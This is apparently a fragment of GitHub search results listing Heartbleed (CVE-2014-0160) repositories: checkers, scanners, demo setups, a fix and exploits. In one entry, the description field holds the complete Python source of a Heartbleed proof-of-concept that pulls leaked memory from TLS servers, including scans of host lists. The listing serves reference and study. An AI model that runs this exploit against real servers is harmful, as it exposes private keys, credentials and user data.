"html_url": "https:\/\/github.com\/xanas"
|
||
},
|
||
"html_url": "https:\/\/github.com\/xanas\/heartbleed.py",
|
||
"description": "#!\/usr\/bin\/python # Modified by Travis Lee # -changed output to display text only instead of hexdump and made it easier to read # -added option to specify number of times to connect to server (to get more data) # -added option to specify TLS version # -added option to send STARTTLS command for use with SMTP\/POP\/IMAP\/FTP\/etc... # -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port) # -added option to have verbose output # -added capability to automatically check if STARTTLS\/STLS\/AUTH TLS is supported when smtp\/pop\/imap\/ftp ports are entered and automatically send appropriate command # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-n', '--num', type='int', default=1, help='Number of times to connect\/loop (default: 1)') options.add_option('-t', '--tls', type='int', default=1, help='Specify TLS version: 0 = 1.0, 1 = 1.1, 2 = 1.2 (default: 1)') options.add_option('-s', '--starttls', action=\"store_true\", dest=\"starttls\", help='Issue STARTTLS command for SMTP\/POP\/IMAP\/FTP\/etc...') options.add_option('-f', '--filein', type='str', help='Specify input file, line delimited, IPs or hostnames or IP:port or hostname:port') options.add_option('-v', '--verbose', action=\"store_true\", dest=\"verbose\", help='Enable verbose output') opts, args = options.parse_args() def h2bin(x): return x.replace(' ', '').replace('\\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') # set TLS version if opts.tls == 0: hb = h2bin('''18 03 01 00 03 01 40 00''') elif opts.tls == 1: hb = h2bin('''18 03 02 00 03 01 40 00''') elif opts.tls == 2: hb = h2bin('''18 03 03 00 03 01 40 00''') else: hb = h2bin('''18 03 02 00 03 01 40 00''') def hexdump(s): pdat = '' for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] #hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat += ''.join((c if ((32 <= ord(c) <= 126) or (ord(c) == 10) or (ord(c) == 13)) else '.' )for c in lin) \t#print ' %04x: %-48s %s' % (b, hxdat, pdat) \tpdat = re.sub(r'([.]{50,})', '', pdat) return pdat def recvall(s, length, timeout=5): try: endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata except: print \"Error receiving data: \", sys.exc_info()[0] def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None if opts.verbose: print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, pay def hit_hb(s, targ): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return '' if typ == 24: if opts.verbose: print 'Received heartbeat response...' #hexdump(pay) if len(pay) > 3: print 'WARNING: ' + targ + ':' + str(opts.port) + ' returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return hexdump(pay) if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return '' def bleed(targ, port): try: res = '' print print '##################################################################' print 'Connecting to: ' + targ + ':' + str(port) + ' with TLSv1.' + str(opts.tls) for x in range(0, opts.num): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sys.stdout.flush() s.settimeout(10) s.connect((targ, port)) # send starttls command if specified as an option or if common smtp\/pop3\/imap ports are used if (opts.starttls) or (port in {25, 587, 110, 143, 21}): stls = False atls = False # check if smtp supports starttls\/stls if port in {25, 587}: print 'SMTP Port... Checking for STARTTLS Capability...' check = s.recv(1024) s.send(\"EHLO someone.org\\n\") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if \"STARTTLS\" in check: opts.starttls = True print \"STARTTLS command found\" elif \"STLS\" in check: opts.starttls = True stls = True print \"STLS command found\" else: print \"STARTTLS command NOT found!\" print '##################################################################' return # check if pop3\/imap supports starttls\/stls elif port in {110, 143}: print 'POP3\/IMAP4 Port... Checking for STARTTLS Capability...' check = s.recv(1024) if port == 110: s.send(\"CAPA\\n\") if port == 143: s.send(\"CAPABILITY\\n\") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if \"STARTTLS\" in check: opts.starttls = True print \"STARTTLS command found\" elif \"STLS\" in check: opts.starttls = True stls = True print \"STLS command found\" else: print \"STARTTLS command NOT found!\" print '##################################################################' return # check if ftp supports auth tls\/starttls elif port in {21}: print 'FTP Port... Checking for AUTH TLS Capability...' check = s.recv(1024) s.send(\"FEAT\\n\") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if \"STARTTLS\" in check: opts.starttls = True print \"STARTTLS command found\" elif \"AUTH TLS\" in check: opts.starttls = True atls = True print \"AUTH TLS command found\" else: print \"STARTTLS command NOT found!\" print '##################################################################' return # send appropriate tls command if supported if opts.starttls: sys.stdout.flush() if stls: print 'Sending STLS Command...' s.send(\"STLS\\n\") elif atls: print 'Sending AUTH TLS Command...' s.send(\"AUTH TLS\\n\") else: print 'Sending STARTTLS Command...' s.send(\"STARTTLS\\n\") if opts.verbose: print 'Waiting for reply...' sys.stdout.flush() recvall(s, 100000, 1) print print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) if opts.verbose: print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' print '##################################################################' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) res += hit_hb(s, targ) s.close() print '##################################################################' print return res except: print \"Error connecting to host: \", sys.exc_info()[0] print '##################################################################' print def main(): allresults = '' # if a file is specified, loop through file if opts.filein: fileIN = open(opts.filein, \"r\") for line in fileIN: targetinfo = line.strip().split(\":\") if len(targetinfo) > 1: allresults = bleed(targetinfo[0], int(targetinfo[1])) else: allresults = bleed(targetinfo[0], opts.port) if allresults: print '%s' % (allresults) fileIN.close() else: if len(args) < 1: options.print_help() return allresults = bleed(args[0], opts.port) if allresults: print '%s' % (allresults) print if __name__ == '__main__': main()",
|
||
"fork": false,
|
||
"created_at": "2015-04-05T22:03:30Z",
|
||
"updated_at": "2020-05-28T14:44:33Z",
|
||
"pushed_at": "2015-04-05T22:03:31Z",
|
||
"stargazers_count": 0,
|
||
"watchers_count": 0,
|
||
"forks_count": 0,
|
||
"forks": 0,
|
||
"watchers": 0,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 35284258,
|
||
"name": "heartbleed",
|
||
"full_name": "iSCInc\/heartbleed",
|
||
"owner": {
|
||
"login": "iSCInc",
|
||
"id": 6920447,
|
||
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/6920447?v=4",
|
||
"html_url": "https:\/\/github.com\/iSCInc"
|
||
},
|
||
"html_url": "https:\/\/github.com\/iSCInc\/heartbleed",
|
||
"description": "A checker (site and tool) for CVE-2014-0160. Software from @FiloSottile for iSC Inc..",
|
||
"fork": false,
|
||
"created_at": "2015-05-08T14:37:44Z",
|
||
"updated_at": "2015-05-15T13:19:04Z",
|
||
"pushed_at": "2015-05-15T13:20:41Z",
|
||
"stargazers_count": 0,
|
||
"watchers_count": 0,
|
||
"forks_count": 0,
|
||
"forks": 0,
|
||
"watchers": 0,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 37109043,
|
||
"name": "cve-2014-0160-Yunfeng-Jiang",
|
||
"full_name": "marstornado\/cve-2014-0160-Yunfeng-Jiang",
|
||
"owner": {
|
||
"login": "marstornado",
|
||
"id": 1574834,
|
||
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/1574834?v=4",
|
||
"html_url": "https:\/\/github.com\/marstornado"
|
||
},
|
||
"html_url": "https:\/\/github.com\/marstornado\/cve-2014-0160-Yunfeng-Jiang",
|
||
"description": null,
|
||
"fork": false,
|
||
"created_at": "2015-06-09T03:55:14Z",
|
||
"updated_at": "2015-06-09T04:03:10Z",
|
||
"pushed_at": "2015-06-09T04:14:11Z",
|
||
"stargazers_count": 0,
|
||
"watchers_count": 0,
|
||
"forks_count": 1,
|
||
"forks": 1,
|
||
"watchers": 0,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 38980774,
|
||
"name": "vaas-cve-2014-0160",
|
||
"full_name": "hmlio\/vaas-cve-2014-0160",
|
||
"owner": {
|
||
"login": "hmlio",
|
||
"id": 11684719,
|
||
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/11684719?v=4",
|
||
"html_url": "https:\/\/github.com\/hmlio"
|
||
},
|
||
"html_url": "https:\/\/github.com\/hmlio\/vaas-cve-2014-0160",
|
||
"description": "Vulnerability as a service: showcasing CVS-2014-0160, a.k.a. Heartbleed",
|
||
"fork": false,
|
||
"created_at": "2015-07-12T22:40:54Z",
|
||
"updated_at": "2020-03-25T02:25:24Z",
|
||
"pushed_at": "2019-10-08T10:03:04Z",
|
||
"stargazers_count": 12,
|
||
"watchers_count": 12,
|
||
"forks_count": 7,
|
||
"forks": 7,
|
||
"watchers": 12,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 43054972,
|
||
"name": "heartbleedscanner",
|
||
"full_name": "hybridus\/heartbleedscanner",
|
||
"owner": {
|
||
"login": "hybridus",
|
||
"id": 5206389,
|
||
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/5206389?v=4",
|
||
"html_url": "https:\/\/github.com\/hybridus"
|
||
},
|
||
"html_url": "https:\/\/github.com\/hybridus\/heartbleedscanner",
|
||
"description": "Network Scanner for OpenSSL Memory Leak (CVE-2014-0160) ",
|
||
"fork": false,
|
||
"created_at": "2015-09-24T08:39:28Z",
|
||
"updated_at": "2020-04-15T09:18:54Z",
|
||
"pushed_at": "2015-09-24T16:15:11Z",
|
||
"stargazers_count": 14,
|
||
"watchers_count": 14,
|
||
"forks_count": 11,
|
||
"forks": 11,
|
||
"watchers": 14,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 51847934,
|
||
"name": "CVE-2014-0160-Chrome-Plugin",
|
||
"full_name": "Xyl2k\/CVE-2014-0160-Chrome-Plugin",
|
||
"owner": {
|
||
"login": "Xyl2k",
|
||
"id": 8536299,
|
||
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/8536299?v=4",
|
||
"html_url": "https:\/\/github.com\/Xyl2k"
|
||
},
|
||
"html_url": "https:\/\/github.com\/Xyl2k\/CVE-2014-0160-Chrome-Plugin",
|
||
"description": "Heartbleed",
|
||
"fork": false,
|
||
"created_at": "2016-02-16T15:49:55Z",
|
||
"updated_at": "2016-02-16T15:49:55Z",
|
||
"pushed_at": "2016-02-16T16:04:33Z",
|
||
"stargazers_count": 0,
|
||
"watchers_count": 0,
|
||
"forks_count": 1,
|
||
"forks": 1,
|
||
"watchers": 0,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 156641077,
|
||
"name": "OpenSSL-HeartBleed-CVE-2014-0160-PoC",
|
||
"full_name": "caiqiqi\/OpenSSL-HeartBleed-CVE-2014-0160-PoC",
|
||
"owner": {
|
||
"login": "caiqiqi",
|
||
"id": 8278315,
|
||
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/8278315?v=4",
|
||
"html_url": "https:\/\/github.com\/caiqiqi"
|
||
},
|
||
"html_url": "https:\/\/github.com\/caiqiqi\/OpenSSL-HeartBleed-CVE-2014-0160-PoC",
|
||
"description": "来自:https:\/\/www.freebuf.com\/articles\/web\/31700.html",
|
||
"fork": false,
|
||
"created_at": "2018-11-08T02:50:28Z",
|
||
"updated_at": "2018-11-08T02:51:58Z",
|
||
"pushed_at": "2018-11-08T02:51:56Z",
|
||
"stargazers_count": 0,
|
||
"watchers_count": 0,
|
||
"forks_count": 4,
|
||
"forks": 4,
|
||
"watchers": 0,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 161246011,
|
||
"name": "HeartBleed",
|
||
"full_name": "Saymeis\/HeartBleed",
|
||
"owner": {
|
||
"login": "Saymeis",
|
||
"id": 42687972,
|
||
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/42687972?v=4",
|
||
"html_url": "https:\/\/github.com\/Saymeis"
|
||
},
|
||
"html_url": "https:\/\/github.com\/Saymeis\/HeartBleed",
|
||
"description": "CVE-2014-0160",
|
||
"fork": false,
|
||
"created_at": "2018-12-10T22:42:51Z",
|
||
"updated_at": "2019-07-31T23:10:49Z",
|
||
"pushed_at": "2019-05-19T15:13:33Z",
|
||
"stargazers_count": 1,
|
||
"watchers_count": 1,
|
||
"forks_count": 0,
|
||
"forks": 0,
|
||
"watchers": 1,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 164344882,
|
||
"name": "cve-2014-0160",
|
||
"full_name": "cved-sources\/cve-2014-0160",
|
||
"owner": {
|
||
"login": "cved-sources",
|
||
"id": 46423677,
|
||
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/46423677?v=4",
|
||
"html_url": "https:\/\/github.com\/cved-sources"
|
||
},
|
||
"html_url": "https:\/\/github.com\/cved-sources\/cve-2014-0160",
|
||
"description": "cve-2014-0160",
|
||
"fork": false,
|
||
"created_at": "2019-01-06T20:57:53Z",
|
||
"updated_at": "2019-01-06T20:59:30Z",
|
||
"pushed_at": "2019-01-06T20:59:29Z",
|
||
"stargazers_count": 0,
|
||
"watchers_count": 0,
|
||
"forks_count": 2,
|
||
"forks": 2,
|
||
"watchers": 0,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 172987767,
|
||
"name": "heartbleed",
|
||
"full_name": "cheese-hub\/heartbleed",
|
||
"owner": {
|
||
"login": "cheese-hub",
|
||
"id": 41589726,
|
||
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/41589726?v=4",
|
||
"html_url": "https:\/\/github.com\/cheese-hub"
|
||
},
|
||
"html_url": "https:\/\/github.com\/cheese-hub\/heartbleed",
|
||
"description": "Demonstration of the Heartbleed Bug CVE-2014-0160",
|
||
"fork": false,
|
||
"created_at": "2019-02-27T20:46:41Z",
|
||
"updated_at": "2019-06-27T13:00:13Z",
|
||
"pushed_at": "2019-06-27T13:00:11Z",
|
||
"stargazers_count": 0,
|
||
"watchers_count": 0,
|
||
"forks_count": 2,
|
||
"forks": 2,
|
||
"watchers": 0,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 179123466,
|
||
"name": "cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS",
|
||
"full_name": "artofscripting\/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS",
|
||
"owner": {
|
||
"login": "artofscripting",
|
||
"id": 1545672,
|
||
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/1545672?v=4",
|
||
"html_url": "https:\/\/github.com\/artofscripting"
|
||
},
|
||
"html_url": "https:\/\/github.com\/artofscripting\/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS",
|
||
"description": null,
|
||
"fork": false,
|
||
"created_at": "2019-04-02T17:08:01Z",
|
||
"updated_at": "2019-04-02T18:11:08Z",
|
||
"pushed_at": "2019-04-02T18:11:07Z",
|
||
"stargazers_count": 0,
|
||
"watchers_count": 0,
|
||
"forks_count": 1,
|
||
"forks": 1,
|
||
"watchers": 0,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 179373566,
|
||
"name": "heartbleed-bug",
|
||
"full_name": "cldme\/heartbleed-bug",
|
||
"owner": {
|
||
"login": "cldme",
|
||
"id": 10621824,
|
||
"avatar_url": "https:\/\/avatars0.githubusercontent.com\/u\/10621824?v=4",
|
||
"html_url": "https:\/\/github.com\/cldme"
|
||
},
|
||
"html_url": "https:\/\/github.com\/cldme\/heartbleed-bug",
|
||
"description": "Example and demo setup for Heartbleed vulnerability (CVE-2014-0160). This should be used for testing purposes only!💔",
|
||
"fork": false,
|
||
"created_at": "2019-04-03T21:32:50Z",
|
||
"updated_at": "2019-04-10T16:42:44Z",
|
||
"pushed_at": "2019-04-10T16:42:43Z",
|
||
"stargazers_count": 0,
|
||
"watchers_count": 0,
|
||
"forks_count": 0,
|
||
"forks": 0,
|
||
"watchers": 0,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 200631397,
|
||
"name": "Heartexploit",
|
||
"full_name": "ThanHuuTuan\/Heartexploit",
|
||
"owner": {
|
||
"login": "ThanHuuTuan",
|
||
"id": 32167814,
|
||
"avatar_url": "https:\/\/avatars2.githubusercontent.com\/u\/32167814?v=4",
|
||
"html_url": "https:\/\/github.com\/ThanHuuTuan"
|
||
},
|
||
"html_url": "https:\/\/github.com\/ThanHuuTuan\/Heartexploit",
|
||
"description": "Aquí está mi nuevo y primer exploit web, este exploit ataca a la vulnerabilidad de HeartBleed (CVE-2014-0160) espero que os guste.",
|
||
"fork": false,
|
||
"created_at": "2019-08-05T10:09:44Z",
|
||
"updated_at": "2020-08-22T02:07:50Z",
|
||
"pushed_at": "2018-05-07T19:11:20Z",
|
||
"stargazers_count": 0,
|
||
"watchers_count": 0,
|
||
"forks_count": 0,
|
||
"forks": 0,
|
||
"watchers": 0,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 234023877,
|
||
"name": "heartbleed_fix_updated",
|
||
"full_name": "hack3r-0m\/heartbleed_fix_updated",
|
||
"owner": {
|
||
"login": "hack3r-0m",
|
||
"id": 54898623,
|
||
"avatar_url": "https:\/\/avatars1.githubusercontent.com\/u\/54898623?v=4",
|
||
"html_url": "https:\/\/github.com\/hack3r-0m"
|
||
},
|
||
"html_url": "https:\/\/github.com\/hack3r-0m\/heartbleed_fix_updated",
|
||
"description": "updating services to fix Heart-bleed bug (CVE-2014-0160)",
|
||
"fork": false,
|
||
"created_at": "2020-01-15T07:31:04Z",
|
||
"updated_at": "2020-01-16T04:24:29Z",
|
||
"pushed_at": "2020-01-16T04:24:27Z",
|
||
"stargazers_count": 0,
|
||
"watchers_count": 0,
|
||
"forks_count": 0,
|
||
"forks": 0,
|
||
"watchers": 0,
|
||
"score": 0
|
||
},
|
||
{
|
||
"id": 277099398,
|
||
"name": "heartbleed",
|
||
"full_name": "rouze-d\/heartbleed",
|
||
"owner": {
|
||
"login": "rouze-d",
|
||
"id": 50823809,
|
||
"avatar_url": "https:\/\/avatars3.githubusercontent.com\/u\/50823809?v=4",
|
||
"html_url": "https:\/\/github.com\/rouze-d"
|
||
},
|
||
"html_url": "https:\/\/github.com\/rouze-d\/heartbleed",
|
||
"description": "Simple OpenSSL TLS Heartbeat (CVE-2014-0160) Scanner and Exploit (Multiple SSL\/TLS versions)",
|
||
"fork": false,
|
||
"created_at": "2020-07-04T11:46:51Z",
|
||
"updated_at": "2020-07-04T12:12:06Z",
|
||
"pushed_at": "2020-07-04T12:12:04Z",
|
||
"stargazers_count": 0,
|
||
"watchers_count": 0,
|
||
"forks_count": 0,
|
||
"forks": 0,
|
||
"watchers": 0,
|
||
"score": 0
|
||
}
|
||
] |